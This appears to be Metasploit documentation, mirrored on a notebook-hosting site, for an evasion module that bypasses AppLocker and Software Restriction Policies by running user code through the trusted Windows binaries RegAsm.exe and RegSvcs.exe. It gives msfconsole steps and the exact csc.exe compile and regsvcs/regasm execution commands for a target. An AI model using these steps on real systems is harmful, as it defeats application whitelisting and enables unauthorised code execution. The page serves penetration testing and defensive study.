Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/evasion/windows/applocker_evasion_regasm_regsvcs.md
Views: 11784
Introduction
This module is designed to evade solutions such as software restriction policies and Applocker. Applocker in its default configuration will block code in the form of executables (.exe and .com, .msi), scripts (.ps1, .vbs, .js) and dll's from running in user controlled directories. Applocker enforces this by employing whitelisting, in that code can only be run from the protected directories and sub directories of "Program Files" and "Windows" The main vector for this bypass is to use the trusted binaries RegAsm.exe or RegSvcs.exe to execute user supplied code as these binaries are located within the trusted Windows directory.
Vulnerable Application
This evasion will work on all versions of Windows that include .NET versions 3.5 or greater that has solutions such as Applocker or Software Restriction Policies active, that do not explicitly block RegAsm.exe, RegSvcs.exe or the "Microsoft.Net" directory.
Options
TXT_FILE - Filename for the evasive file (default: regasm_regsvcs.txt).
SNK_FILE - Filename for the .snk file (default: key.snk). (note: to aid further evasion it is recommended to create your own .snk file ref: https://docs.microsoft.com/en-us/dotnet/framework/app-domains/how-to-sign-an-assembly-with-a-strong-name)
Verification Steps
Start
msfconsoleDo:
use evasion/windows/applocker_evasion_regasm_regsvcsDo:
set PAYLOAD <payload>Do:
runThe module will now display instructions of how to proceed
[+] regasm_regsvcs.txt stored at /root/.msf4/local/regasm_regsvcs.txt[+] key.snk stored at /root/.msf4/local/key.snk[*] Copy regasm_regsvcs.txt and key.snk to the target[*] Compile using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regasm_regsvcs.dll /keyfile:key.snk regasm_regsvcs.txtreplace [.NET Version] with the version directory present on the target (typically "v4.0.30319").[*] Execute using: C:\Windows\Microsoft.NET\Framework64\[.NET Version]\regsvcs.exe regasm_regsvcs.dllreplace [.NET Version] with the version directory present on the target (typically "v4.0.30319").[*] or[*] Execute using: C:\Windows\Microsoft.NET\Framework64\[.NET Version]\regasm.exe /U regasm_regsvcs.dllreplace [.NET Version] with the version directory present on the target (typically "v4.0.30319").